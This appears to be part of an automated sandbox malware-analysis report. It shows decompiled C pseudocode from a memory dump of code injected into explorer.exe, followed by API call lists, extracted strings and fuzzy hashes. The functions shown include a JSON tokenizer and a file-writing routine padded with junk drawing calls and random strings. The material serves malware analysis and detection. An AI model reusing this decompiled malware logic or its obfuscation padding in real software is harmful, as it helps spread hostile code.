					 *((intOrPtr*)(_t251 + 0xb0)) = E00F5BC8A( &_v308);
					Arc(0, 0x41, 0x5e, 8, 0x4c, 0x19, 0x27, 0x32, 0x20);
					 *((intOrPtr*)(_t251 + 0xb4)) = E00F5BC8A(_v12);
					 *((intOrPtr*)(_t251 + 0xb8)) = E00F5BC8A(_v8);
					BitBlt(0, 7, 0x45, 2, 0x2d, 0, 0, 0x2e, 0x39);
					 *((intOrPtr*)(_t251 + 0xbc)) = E00F5BC8A(_v16);
					 *((intOrPtr*)(_t251 + 0xc0)) = E00F5BC8A(_v24);
					 *((intOrPtr*)(_t251 + 0xc4)) = E00F5BC8A(_v36);
					 *((intOrPtr*)(_t251 + 0xc8)) = E00F5BC8A(_v32);
					E00F5BA86( &_v44);
					E00F5BA86( &_v52);
					E00F5BA86( &_v48);
					E00F5BA86( &_v20);
					E00F5BA86( &_v28);
					E00F5BA86( &_v40);
					E00F5BA86( &_v12);
					E00F5BA86( &_v8);
					E00F5BA86( &_v16);
					E00F5BA86( &_v24);
					ArcTo(0, 0x40, 0x5c, 5, 3, 0x1d, 0x2b, 0x1e, 0x40);
					E00F5BA86( &_v36);
					E00F5BA86( &_v32);
					 *((intOrPtr*)(_t251 + 0x94)) = 6;
					_t215 = E00F5AC58(0x18);
					_pop(_t289);
					 *((intOrPtr*)(_t251 + 0x98)) = _t215;
					if(_t215 != 0) {
						_t217 = E00F62CCE(_t289, 0x2b6);
						_t310 = _t217;
						_v40 = _t217;
						 *_t316 = 0x43a;
						_v32 = E00F62CCE(_t289);
						 *_t316 = 0x34e;
						_v36 = E00F62CCE(_t289);
						 *_t316 = 0x786;
						_v24 = E00F62CCE(_t289);
						 *_t316 = 0x5ed;
						_v16 = E00F62CCE(_t289);
						 *_t316 = 0xac3;
						_v8 = E00F62CCE(_t289);
						 *_t316 = 0x3ca;
						_v12 = E00F62CCE(_t289);
						 *_t316 = 0x7a3;
						_v28 = E00F62CCE(_t289);
						 *_t316 = 0xafd;
						_t225 = E00F62CCE(_t289);
						_pop(_t290);
						_t313 = "*";
						_v20 = _t225;
						 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x98)))) = E00F6280D(_t290, _t217, _v32, "*");
						 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x98)) + 4)) = E00F6280D( *((intOrPtr*)(_t251 + 0x98)), _t217, _v36, "*");
						 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x98)) + 8)) = E00F6280D( *((intOrPtr*)(_t251 + 0x98)), _t310, _v24, "*");
						 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x98)) + 0xc)) = E00F6280D( *((intOrPtr*)(_t251 + 0x98)), _t310, _v16, _t313);
						 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x98)) + 0x10)) = E00F6280D( *((intOrPtr*)(_t251 + 0x98)), _t310, _v8, _v28);
						 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x98)) + 0x14)) = E00F6280D( *((intOrPtr*)(_t251 + 0x98)), _t310, _v12, _v20);
						E00F5BA86( &_v40);
						E00F5BA86( &_v32);
						E00F5BA86( &_v36);
						E00F5BA86( &_v24);
						E00F5BA86( &_v16);
						E00F5BA86( &_v8);
						E00F5BA86( &_v12);
						E00F5BA86( &_v28);
						E00F5BA86( &_v20);
					}
					return _t251;
				}
				return _t125;
			}

0x00f59d16
0x00f59d1b
0x00f59d20
0x00f59d2e
0x00f59d30
0x00f59d3c
0x00f59d44
0x00f59d4c
0x00f59d4d
0x00f59d57
0x00f59d58
0x00f59d5e
0x00f59d61
0x00f59d68
0x00f59d69
0x00f59d73
0x00f59d76
0x00f59d86
0x00f59d89
0x00f59d8e
0x00f59d9c
0x00f59d9f
0x00f59daa
0x00f59dad
0x00f59dbb
0x00f59dc9
0x00f59dc9
0x00f59dcc
0x00f59dd7
0x00f59ddd
0x00f59ded
0x00f59df0
0x00f59dfb
0x00f59dfe
0x00f59e0b
0x00f59e0e
0x00f59e19
0x00f59e1c
0x00f59e27
0x00f59e28
0x00f59e30
0x00f59e3f
0x00f59e46
0x00f59e4b
0x00f59e53
0x00f59e56
0x00f59e60
0x00f59e66
0x00f59e75
0x00f59e7b
0x00f59e80
0x00f59e82
0x00f59e8a
0x00f59e8d
0x00f59e99
0x00f59e9c
0x00f59ea8
0x00f59eab
0x00f59eb7
0x00f59eba
0x00f59ec1
0x00f59ec7
0x00f59ed3
0x00f59ee3
0x00f59eea
0x00f59eef
0x00f59ef7
0x00f59eff
0x00f59f02
0x00f59f0e
0x00f59f11
0x00f59f18
0x00f59f1d
0x00f59f23
0x00f59f2b
0x00f59f2e
0x00f59f3e
0x00f59f4a
0x00f59f59
0x00f59f68
0x00f59f77
0x00f59f82
0x00f59fa7
0x00f59fad
0x00f59fbf
0x00f59fda
0x00f59fe0
0x00f59ff2
0x00f5a001
0x00f5a010
0x00f5a01b
0x00f5a026
0x00f5a030
0x00f5a03a
0x00f5a044
0x00f5a04e
0x00f5a058
0x00f5a062
0x00f5a06c
0x00f5a076
0x00f5a080
0x00f5a097
0x00f5a0a1
0x00f5a0ab
0x00f5a0b3
0x00f5a0bd
0x00f5a0c2
0x00f5a0c3
0x00f5a0cb
0x00f5a0d6
0x00f5a0db
0x00f5a0dd
0x00f5a0e0
0x00f5a0ec
0x00f5a0ef
0x00f5a0fb
0x00f5a0fe
0x00f5a10a
0x00f5a10d
0x00f5a119
0x00f5a11c
0x00f5a128
0x00f5a12b
0x00f5a137
0x00f5a13a
0x00f5a146
0x00f5a149
0x00f5a150
0x00f5a155
0x00f5a156
0x00f5a15f
0x00f5a175
0x00f5a18a
0x00f5a1a0
0x00f5a1b5
0x00f5a1cd
0x00f5a1df
0x00f5a1e9
0x00f5a1f3
0x00f5a1fd
0x00f5a207
0x00f5a211
0x00f5a21b
0x00f5a225
0x00f5a22f
0x00f5a239
0x00f5a23e
0x00000000
0x00f5a23f
0x00f5a245

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

Part of subcall function 00F5CFBA: _vsnprintf.MSVCRT ref: 00F5CFCF

GetSystemMetrics.USER32 ref: 00F59E42
GetSystemMetrics.USER32 ref: 00F59E49

Part of subcall function 00F5BC8A: memset.MSVCRT ref: 00F5BCC7
Part of subcall function 00F5BC8A: CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,77432D10,00000000), ref: 00F5BCEB

Part of subcall function 00F5BC8A: CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F5BD05
Part of subcall function 00F5BC8A: IsTextUnicode.ADVAPI32(00F59F46,00000000,?), ref: 00F5BDEF

Arc.GDI32(00000000,00000041,0000005E,00000008,0000004C,00000019,00000027,00000032,00000020), ref: 00F59FAD
BitBlt.GDI32(00000000,00000007,00000045,00000002,0000002D,00000000,00000000,0000002E,00000039), ref: 00F59FE0
ArcTo.GDI32(00000000,00000040,0000005C,00000005,00000003,0000001D,0000002B,0000001E,00000040), ref: 00F5A097

Part of subcall function 00F6280D: SysAllocString.OLEAUT32(?), ref: 00F628B0
Part of subcall function 00F6280D: SysAllocString.OLEAUT32(00000000), ref: 00F628C4
Part of subcall function 00F6280D: SysFreeString.OLEAUT32(?), ref: 00F62C47
Part of subcall function 00F6280D: SysFreeString.OLEAUT32(?), ref: 00F62C4C

Part of subcall function 00F6280D: SafeArrayDestroy.OLEAUT32(?), ref: 00F62BF4

Part of subcall function 00F6280D: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 00F6295D
Part of subcall function 00F6280D: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00F6296C
Part of subcall function 00F6280D: SafeArrayDestroy.OLEAUT32(?), ref: 00F62BB8

Part of subcall function 00F6280D: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 00F629D8
Part of subcall function 00F6280D: VariantClear.OLEAUT32(?), ref: 00F62B97
Part of subcall function 00F6280D: SysFreeString.OLEAUT32(?), ref: 00F62BA0

Strings

%u.%u.%u.%u.%u.%u.%04x, xrefs: 00F59D61

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ArraySafeString$Free$AllocBoundCreateDestroyMetricsPipeSystem$AllocateClearElementHeapTextUnicodeVariant_vsnprintfmemset
String ID: %u.%u.%u.%u.%u.%u.%04x
API String ID: 3112566777-512370406
Opcode ID: 921e77f44c969765e1753f3ba71876b9fdba73a229c07cb6501c3e00aeb54807
Instruction ID: 292cb6ed6c9d145c48c5e5c0f3bcd408d79ebc801accaa0a1bcb1fa7f3172a12
Opcode Fuzzy Hash: 921e77f44c969765e1753f3ba71876b9fdba73a229c07cb6501c3e00aeb54807
Instruction Fuzzy Hash: CEE13071900204AFDB51EFA4DC86AAD7BF4FF08311F14446AFA18AB292DB7C9544AF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F6DDBC, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00F6DDBC(void* __ebx, intOrPtr __edx, void* __eflags, void* __fp0) {
				char _v8;
				long long _v16;
				void* __esi;
				void* _t51;
				intOrPtr _t56;
				void* _t62;
				signed int _t71;
				void* _t74;
				void* _t76;
				signed int _t82;
				signed int* _t90;
				intOrPtr* _t91;
				void* _t96;
				intOrPtr _t119;
				signed int _t122;
				signed int _t123;
				intOrPtr _t128;
				signed int _t131;
				intOrPtr* _t139;
				void* _t152;

				_t152 = __fp0;
				_t119 = __edx;
				_t96 = __ebx;
				_t51 = E00F6F26B(__ebx + 0x28);
				if( *((intOrPtr*)(__ebx + 0x3c)) == 0x100) {
					E00F6F118(_t51,  *(__ebx + 0x40));
					 *(__ebx + 0x40) =  *(__ebx + 0x40) & 0x00000000;
					 *(__ebx + 0x44) =  *(__ebx + 0x44) & 0x00000000;
				}
				_push(_t122);
				do {
					_t131 = E00F6D9B4(_t96);
				} while (_t131 == 0x20 || _t131 == 9 || _t131 == 0xa || _t131 == 0xd);
				_t123 = _t122 | 0xffffffff;
				if(_t131 != _t123) {
					__eflags = _t131 - 0xfffffffe;
					if(_t131 != 0xfffffffe) {
						E00F6F27C(_t96 + 0x28, _t131);
						__eflags = _t131 - 0x7b;
						if(_t131 == 0x7b) {
							L67:
							 *(_t96 + 0x3c) = _t131;
							goto L68;
						}
						__eflags = _t131 - 0x7d;
						if(_t131 == 0x7d) {
							goto L67;
						}
						__eflags = _t131 - 0x5b;
						if(_t131 == 0x5b) {
							goto L67;
						}
						__eflags = _t131 - 0x5d;
						if(_t131 == 0x5d) {
							goto L67;
						}
						__eflags = _t131 - 0x3a;
						if(_t131 == 0x3a) {
							goto L67;
						}
						__eflags = _t131 - 0x2c;
						if(_t131 == 0x2c) {
							goto L67;
						}
						__eflags = _t131 - 0x22;
						if(__eflags != 0) {
							__eflags = _t131 - 0x30;
							if(_t131 < 0x30) {
								L21:
								__eflags = _t131 - 0x2d;
								if(_t131 != 0x2d) {
									__eflags = _t131 - 0x41;
									if(_t131 < 0x41) {
										L54:
										__eflags = _t131 + 0xffffff9f - 0x19;
										if(__eflags > 0) {
											while(1) {
												_t56 =  *((intOrPtr*)(_t96 + 0x10));
												__eflags =  *((char*)(_t56 + _t96 + 8));
												if( *((char*)(_t56 + _t96 + 8)) == 0) {
													break;
												}
												E00F6F27C(_t96 + 0x28,  *( *((intOrPtr*)(_t96 + 0x10)) + _t96 + 8) & 0x000000ff);
												 *((intOrPtr*)(_t96 + 0x10)) =  *((intOrPtr*)(_t96 + 0x10)) + 1;
												_t43 = _t96 + 0x24;
												 *_t43 =  *(_t96 + 0x24) + 1;
												__eflags =  *_t43;
											}
											goto L10;
										} else {
											goto L55;
										}
										do {
											while(1) {
												L55:
												_t62 = E00F6DB5D(_t96, __eflags);
												__eflags = _t62 - 0x41;
												if(_t62 < 0x41) {
													break;
												}
												__eflags = _t62 - 0x5a;
												if(__eflags <= 0) {
													continue;
												}
												break;
											}
											__eflags = _t62 - 0x61;
											if(_t62 < 0x61) {
												break;
											}
											__eflags = _t62 - 0x7a;
										} while (__eflags <= 0);
										E00F6DBAC(_t62, _t96);
										E00F6F15E(_t96 + 0x28);
										_push(5);
										__eflags = 0;
										asm("repe cmpsb");
										if(0 != 0) {
											_push(6);
											__eflags = 0;
											asm("repe cmpsb");
											if(0 != 0) {
												_push(5);
												asm("repe cmpsb");
												 *(_t96 + 0x3c) = 0x103;
											} else {
												 *(_t96 + 0x3c) = 0x104;
											}
										} else {
											 *(_t96 + 0x3c) = 0x103;
										}
										goto L68;
									}
									__eflags = _t131 - 0x5a;
									if(__eflags <= 0) {
										goto L55;
									}
									goto L54;
								}
								L22:
								_t71 = _t131;
								 *(_t96 + 0x3c) = _t123;
								__eflags = _t131 - 0x2d;
								if(__eflags == 0) {
									_t71 = E00F6DB5D(_t96, __eflags);
								}
								__eflags = _t71 - 0x30;
								if(__eflags != 0) {
									_t14 = _t71 - 0x30; // -48
									__eflags = _t14 - 9;
									if(__eflags > 0) {
										goto L26;
									} else {
										goto L28;
									}
									while(1) {
										L28:
										_t74 = E00F6DB5D(_t96, __eflags);
										__eflags = _t74 - 0x30;
										if(_t74 < 0x30) {
											goto L30;
										}
										__eflags = _t74 - 0x39;
										if(__eflags <= 0) {
											continue;
										}
										goto L30;
									}
									goto L30;
								} else {
									_t74 = E00F6DB5D(_t96, __eflags);
									_t13 = _t74 - 0x30; // -48
									__eflags = _t13 - 9;
									if(_t13 > 9) {
										L30:
										__eflags =  *(_t96 + 0x34) & 0x00000008;
										if(( *(_t96 + 0x34) & 0x00000008) != 0) {
											L36:
											__eflags = _t74 - 0x2e;
											if(_t74 != 0x2e) {
												L41:
												__eflags = _t74 - 0x45;
												if(__eflags == 0) {
													L43:
													_t76 = E00F6DB5D(_t96, __eflags);
													__eflags = _t76 - 0x2b;
													if(__eflags == 0) {
														L45:
														_t71 = E00F6DB5D(_t96, __eflags);
														L46:
														_t25 = _t71 - 0x30; // -48
														__eflags = _t25 - 9;
														if(__eflags > 0) {
															goto L26;
														} else {
															goto L47;
														}
														while(1) {
															L47:
															_t74 = E00F6DB5D(_t96, __eflags);
															__eflags = _t74 - 0x30;
															if(_t74 < 0x30) {
																break;
															}
															__eflags = _t74 - 0x39;
															if(__eflags <= 0) {
																continue;
															}
															break;
														}
														L49:
														E00F6DBAC(_t74, _t96);
														_t82 = E00F6F503(_t96 + 0x28, _t152, _t96 + 0x28,  &_v16);
														__eflags = _t82;
														if(_t82 == 0) {
															 *(_t96 + 0x3c) = 0x102;
															 *((long long*)(_t96 + 0x40)) = _v16;
														}
														goto L68;
													}
													__eflags = _t76 - 0x2d;
													if(__eflags != 0) {
														goto L46;
													}
													goto L45;
												}
												__eflags = _t74 - 0x65;
												if(__eflags != 0) {
													goto L49;
												}
												goto L43;
											}
											L37:
											_t137 = _t96;
											_t23 = E00F6D9B4(_t96) - 0x30; // -48
											__eflags = _t23 - 9;
											if(__eflags > 0) {
												E00F6DB2E(_t83, _t137);
												goto L68;
											}
											E00F6F27C(_t96 + 0x28, _t83);
											while(1) {
												_t74 = E00F6DB5D(_t96, __eflags);
												__eflags = _t74 - 0x30;
												if(_t74 < 0x30) {
													goto L41;
												}
												__eflags = _t74 - 0x39;
												if(__eflags <= 0) {
													continue;
												}
												goto L41;
											}
											goto L41;
										}
										__eflags = _t74 - 0x2e;
										if(_t74 == 0x2e) {
											goto L37;
										}
										__eflags = _t74 - 0x45;
										if(_t74 == 0x45) {
											goto L36;
										}
										__eflags = _t74 - 0x65;
										if(_t74 == 0x65) {
											goto L36;
										}
										E00F6DBAC(_t74, _t96);
										_t90 = E00F6F15E(_t96 + 0x28);
										L00F7073E();
										 *_t90 =  *_t90 & 0x00000000;
										_push(0xa);
										_t91 =  &_v8;
										_push(_t91);
										_push(_t90);
										L00F70738();
										_t139 = _t91;
										_t128 = _t119;
										L00F7073E();
										__eflags =  *_t91 - 0x22;
										if( *_t91 != 0x22) {
											 *(_t96 + 0x3c) = 0x101;
											 *((intOrPtr*)(_t96 + 0x40)) = _t139;
											 *((intOrPtr*)(_t96 + 0x44)) = _t128;
										}
										goto L68;
									}
									L26:
									E00F6DBAC(_t71, _t96);
									goto L68;
								}
							}
							__eflags = _t131 - 0x39;
							if(_t131 <= 0x39) {
								goto L22;
							}
							goto L21;
						} else {
							E00F6DBCA(_t96, __eflags);
							goto L68;
						}
					}
					L10:
					 *(_t96 + 0x3c) = _t123;
					goto L68;
				} else {
					 *(_t96 + 0x3c) =  *(_t96 + 0x3c) & 0x00000000;
					L68:
					return  *(_t96 + 0x3c);
				}
			}

0x00f6ddbc
0x00f6ddbc
0x00f6ddbc
0x00f6ddc6
0x00f6ddd3
0x00f6ddd8
0x00f6dddd
0x00f6dde1
0x00f6dde5
0x00f6dde7
0x00f6dde8
0x00f6ddef
0x00f6ddf1
0x00f6de05
0x00f6de0a
0x00f6de15
0x00f6de18
0x00f6de27
0x00f6de2e
0x00f6de31
0x00f6e09c
0x00f6e09c
0x00000000
0x00f6e09c
0x00f6de37
0x00f6de3a
0x00000000
0x00000000
0x00f6de40
0x00f6de43
0x00000000
0x00000000
0x00f6de49
0x00f6de4c
0x00000000
0x00000000
0x00f6de52
0x00f6de55
0x00000000
0x00000000
0x00f6de5b
0x00f6de5e
0x00000000
0x00000000
0x00f6de64
0x00f6de67
0x00f6de75
0x00f6de78
0x00f6de7f
0x00f6de7f
0x00f6de82
0x00f6dfe2
0x00f6dfe5
0x00f6dfec
0x00f6dfef
0x00f6dff2
0x00f6e08d
0x00f6e08d
0x00f6e090
0x00f6e095
0x00000000
0x00000000
0x00f6e080
0x00f6e085
0x00f6e088
0x00f6e088
0x00f6e088
0x00f6e08c
0x00000000
0x00000000
0x00000000
0x00000000
0x00f6dff8
0x00f6dff8
0x00f6dff8
0x00f6dffa
0x00f6dfff
0x00f6e002
0x00000000
0x00000000
0x00f6e004
0x00f6e007
0x00000000
0x00000000
0x00000000
0x00f6e007
0x00f6e009
0x00f6e00c
0x00000000
0x00000000
0x00f6e00e
0x00f6e00e
0x00f6e015
0x00f6e01e
0x00f6e024
0x00f6e02e
0x00f6e030
0x00f6e032
0x00f6e03d
0x00f6e047
0x00f6e049
0x00f6e04b
0x00f6e05a
0x00f6e062
0x00f6e06e
0x00f6e04d
0x00f6e04d
0x00f6e04d
0x00f6e034
0x00f6e034
0x00f6e034
0x00000000
0x00f6e032
0x00f6dfe7
0x00f6dfea
0x00000000
0x00000000
0x00000000
0x00f6dfea
0x00f6de88
0x00f6de88
0x00f6de8a
0x00f6de8d
0x00f6de90
0x00f6de94
0x00f6de94
0x00f6de99
0x00f6de9c
0x00f6deb9
0x00f6debc
0x00f6debf
0x00000000
0x00000000
0x00000000
0x00000000
0x00f6dec1
0x00f6dec1
0x00f6dec3
0x00f6dec8
0x00f6decb
0x00000000
0x00000000
0x00f6decd
0x00f6ded0
0x00000000
0x00000000
0x00000000
0x00f6ded0
0x00000000
0x00f6de9e
0x00f6dea0
0x00f6dea5
0x00f6dea8
0x00f6deab
0x00f6ded2
0x00f6ded2
0x00f6ded6
0x00f6df34
0x00f6df34
0x00f6df37
0x00f6df69
0x00f6df69
0x00f6df6c
0x00f6df73
0x00f6df75
0x00f6df7a
0x00f6df7d
0x00f6df84
0x00f6df86
0x00f6df8b
0x00f6df8b
0x00f6df8e
0x00f6df91
0x00000000
0x00000000
0x00000000
0x00000000
0x00f6df97
0x00f6df97
0x00f6df99
0x00f6df9e
0x00f6dfa1
0x00000000
0x00000000
0x00f6dfa3
0x00f6dfa6
0x00000000
0x00000000
0x00000000
0x00f6dfa6
0x00f6dfa8
0x00f6dfaa
0x00f6dfb7
0x00f6dfbe
0x00f6dfc0
0x00f6dfc9
0x00f6dfd0
0x00f6dfd0
0x00000000
0x00f6dfc0
0x00f6df7f
0x00f6df82
0x00000000
0x00000000
0x00000000
0x00f6df82
0x00f6df6e
0x00f6df71
0x00000000
0x00000000
0x00000000
0x00f6df71
0x00f6df39
0x00f6df39
0x00f6df40
0x00f6df43
0x00f6df46
0x00f6dfd8
0x00000000
0x00f6dfd8
0x00f6df51
0x00f6df58
0x00f6df5a
0x00f6df5f
0x00f6df62
0x00000000
0x00000000
0x00f6df64
0x00f6df67
0x00000000
0x00000000
0x00000000
0x00f6df67
0x00000000
0x00f6df58
0x00f6ded8
0x00f6dedb
0x00000000
0x00000000
0x00f6dedd
0x00f6dee0
0x00000000
0x00000000
0x00f6dee2
0x00f6dee5
0x00000000
0x00000000
0x00f6dee9
0x00f6def2
0x00f6def9
0x00f6defe
0x00f6df01
0x00f6df03
0x00f6df06
0x00f6df07
0x00f6df08
0x00f6df10
0x00f6df12
0x00f6df14
0x00f6df19
0x00f6df1c
0x00f6df22
0x00f6df29
0x00f6df2c
0x00f6df2c
0x00000000
0x00f6df1c
0x00f6dead
0x00f6deaf
0x00000000
0x00f6deaf
0x00f6de9c
0x00f6de7a
0x00f6de7d
0x00000000
0x00000000
0x00000000
0x00f6de69
0x00f6de6b
0x00000000
0x00f6de6b
0x00f6de67
0x00f6de1a
0x00f6de1a
0x00000000
0x00f6de0c
0x00f6de0c
0x00f6e09f
0x00f6e0a5
0x00f6e0a5

Strings

false, xrefs: 00F6E03F
true, xrefs: 00F6E026
null, xrefs: 00F6E05C

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: false$null$true
API String ID: 0-2913297407
Opcode ID: 5030a4100596df5dd8cb05c38365cbd4d312769e2fd0bc92171f63409be08ea7
Instruction ID: 17888a77e9b2ea4a26c882b41b98df01a57cc4b394a6b2cc8f739bc7f2c4873e
Opcode Fuzzy Hash: 5030a4100596df5dd8cb05c38365cbd4d312769e2fd0bc92171f63409be08ea7
Instruction Fuzzy Hash: B971C677F002009ADF38BE289CC55AC7658AB56330F261567E812CF197DAB9CCC4BB81

Uniqueness

Uniqueness Score: -1.00%

Function 00F55CBC, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00F55CBC(signed int __eax, void* __edx, void* __edi, void* __fp0, int _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				char _v36;
				int _v37;
				char _v52;
				char _v180;
				short _v244;
				void* __esi;
				char _t57;
				intOrPtr _t60;
				WCHAR* _t62;
				void* _t64;
				int _t68;
				intOrPtr _t69;
				void* _t73;
				intOrPtr _t76;
				void* _t79;
				intOrPtr _t90;
				void* _t95;
				int _t101;
				void* _t108;
				void* _t114;
				void* _t115;
				CHAR* _t116;
				int _t120;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t132 = __fp0;
				_t115 = __edi;
				_t114 = __edx;
				_t101 = 0;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_a4 == 1 || _a4 == 2) {
					_t57 = E00F5D2EE(_a8,  &_v20);
					_v28 = _t57;
					__eflags = _t57 - _t101;
					if(__eflags != 0) {
						_push(_t115);
						E00F55C56( &_v180, __eflags, _a4);
						_t60 =  *0xf89720; // 0xf90000
						_push(_t101);
						_push(L"\\u");
						_t62 = E00F5B60A(_t60 + 0x438);
						_push(_t101);
						_push( &_v180);
						_t116 = "\\";
						_push(_t116);
						_v32 = _t62;
						_v24 = E00F5B60A(_t62);
						_t64 = E00F5CEF9(_t114, _t101);
						_t127 = _t126 + 0x24;
						__eflags = _t114 - _t101;
						if(__eflags > 0) {
							L13:
							CreateDirectoryW(_v32, _t101);
							_t68 = E00F617E7(_v20, _v28,  &_v16);
							_v12 = _t68;
							__eflags = _t68 - _t101;
							if(_t68 > _t101) {
								_t69 =  *0xf89720; // 0xf90000
								_t120 = E00F61F51(2, _v24, _t69 + 0xb0, 2);
								_t128 = _t127 + 0xc;
								_a4 = _t120;
								__eflags = _t120 - _t101;
								if(_t120 != _t101) {
									_t73 = E00F61D7B(_t72, _t120, _v16, _v12);
									_pop(_t108);
									__eflags = _t73;
									if(_t73 >= 0) {
										E00F61CD2(_t108, _t114,  &_a4);
										_push(_t101);
										_push( &_v180);
										_t76 =  *0xf89720; // 0xf90000
										_push(_t116);
										_v36 = E00F5B60A(_t76 + 0x438);
										_t79 = E00F5B214(_t78, _t132, _v24);
										_t128 = _t128 + 0x14;
										__eflags = _t79;
										if(_t79 < 0) {
											_v8 = 0xfffffff9;
										}
										E00F5AB81( &_v36, 0xfffffffe);
										_pop(_t108);
										__eflags = _v8 - _t101;
										if(__eflags == 0) {
											E00F5776F(_t114, __eflags, 0x2deb8b96);
											__eflags = _v8 - _t101;
											_pop(_t108);
										}
										if(__eflags >= 0) {
											L26:
											E00F5AB81( &_v28, _v20);
											__eflags = _v12 - _t101;
											if(_v12 > _t101) {
												_t101 = _v12;
											}
											E00F5AB81( &_v16, _t101);
											E00F5AB81( &_v32, 0xfffffffe);
											E00F5AB81( &_v24, 0xfffffffe);
											_t90 = _v8;
											L29:
											return _t90;
										} else {
											L24:
											__eflags = _a4 - _t101;
											if(_a4 != _t101) {
												E00F61CD2(_t108, _t114,  &_a4);
											}
											goto L26;
										}
									}
									_v8 = 0xfffffffb;
									goto L24;
								}
								_v8 = 0xfffffffc;
								goto L26;
							}
							_v8 = 0xfffffffd;
							goto L26;
						}
						if(__eflags < 0) {
							L12:
							CreateEnhMetaFileA(_t101, "ZJzdBgDp 0bdY4 Tyjn0HnEl,zWU pZvsrqKXeJcvvcbCW0Gae3lu03DncW6oM9cv70ZjJejfOv49JtLld.Iyrtn,VLFTZY73mLqFFs1YqP5DiQwnbPI8eWmsE85Ll7FH5  DTH6 7ZJFtTp 0E PG80,u4d8EUFmq PnX.pvX  3LPCLUHvnZTn57lKJVt3XFsbiMOwn5W40Wes5SvnK3C3ral6RyjLlo7E8voz4rou2 vv.urjqx82JiSZsKNvp4PhRRMDfaON 3kCAHz Tm.4RP78WnaYHmL5QJDHiBlPpX8MGEFqZj,GBfyr8zE PVQXuwzK31S65a3s1E,p.f7n 8x3GvkchriBxeFBUtRJ5u9KCgv h8pEWygunn4 JudZpNLsuX5XLg3Cq5m5t8T5MNCODCI0c 7aV9U3vWdHf.3Lkq9GI7n  ,OE8ZB6teq,P7I.Oo2eX6sMHtjE3ryCFyGXqrqpbJvY246OwlYQlt9I9ibBM19HKG6fq73Fwwf3v1. n,p TE1l P4KXVVoDzTfFy2zqu9nWdE5o.eYB69  kX1fWj7jJKGPZy3uKrZkmFrqZqPOUJg6yRCUEnk9XW UJ aSbV6CmtGoY cWymOEXYD54EfF.x8WtEeY rsWNGwacELl l2vEgJlQguu4H7EUmO5q5AGMlYOcGvy.MU0H00MPcsR 4hbMCcMmGEYr7hyEpEOw1Gh.VeY0Ea0S4QF43CGH91oKx.Fd2KfvQ6OgRQ lDpS7T6wvoGoYbK.GVtaAqC 0YdhXfK5 MDL8W4T4 fPkXANPRNh7,a78Z5wRcsQI4V2XRFdvahx5FV.xKgWSZNxGuWxtoRu H6WfPkUk9OkwXzHNz07rmiXcHK3mwxvpT17cfaRl.upUavxMY2 qA3Lh.K zk80zz POo AIUHaCIH3DIeuju7nYXcfF,5pFT01MUZCf.wFkzLZVe7m.XGeIdY7DALvT  8icG38B1BsL77UYf tdYMRxLzzg0kBWc x4zLpD0f0", _t101, _t101);
							goto L13;
						}
						__eflags = _t64 - 0x2bcf;
						if(_t64 >= 0x2bcf) {
							goto L13;
						}
						goto L12;
					}
					GetLastError();
					_t95 = E00F5ACD6("E.2dYoc0ha2CLaF xFM6Bwa3epL4g8MXrs0qfPycMQpzuwXb.j 4oc5yHjRNy35mCTKLu9UK Ahuxiqm0ng4f7N2eEGL0oHTaf cg kAS3n2Gx7A5APbYyFwUaniCUWMN,NVEmTqrRl4oFYn.tXnb,0EClpfx5M oi QZDZ3,pzOScVDw4uUFvYc7d9lPbd KfXljKTOvMAKS5nfrQNh62xG.y cWe6ltY2ErU0rRL2Eg,JktMOiKoW5z,MLYYyd6");
					_t124 = 0xf;
					__eflags = _t95 - _t124;
					if(_t95 <= _t124) {
						_t124 = _t95;
					}
					_v37 = _t101;
					_a4 = _t101;
					__eflags = _t124 - _t101;
					if(_t124 <= _t101) {
						L8:
						_t90 = 0xfffffffe;
						goto L29;
					} else {
						do {
							_t12 = _a4 + 0x42; // 0x43
							 *((char*)(_t125 + _a4 - 0x30)) = _t12;
							MultiByteToWideChar(_t101, _t101,  &_v52, 0xffffffff,  &_v244, 0x20);
							_a4 = _a4 + 1;
							__eflags = _a4 - _t124;
						} while (_a4 < _t124);
						goto L8;
					}
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00f55cbc
0x00f55cbc
0x00f55cbc
0x00f55cc6
0x00f55ccc
0x00f55ccf
0x00f55cd2
0x00f55cd5
0x00f55ced
0x00f55cf4
0x00f55cf7
0x00f55cf9
0x00f55d50
0x00f55d5a
0x00f55d5f
0x00f55d64
0x00f55d6a
0x00f55d70
0x00f55d75
0x00f55d7c
0x00f55d7d
0x00f55d82
0x00f55d84
0x00f55d8d
0x00f55d90
0x00f55d95
0x00f55d98
0x00f55d9a
0x00f55db3
0x00f55db7
0x00f55dc7
0x00f55dcd
0x00f55dd0
0x00f55dd2
0x00f55de0
0x00f55df7
0x00f55df9
0x00f55dfc
0x00f55dff
0x00f55e01
0x00f55e15
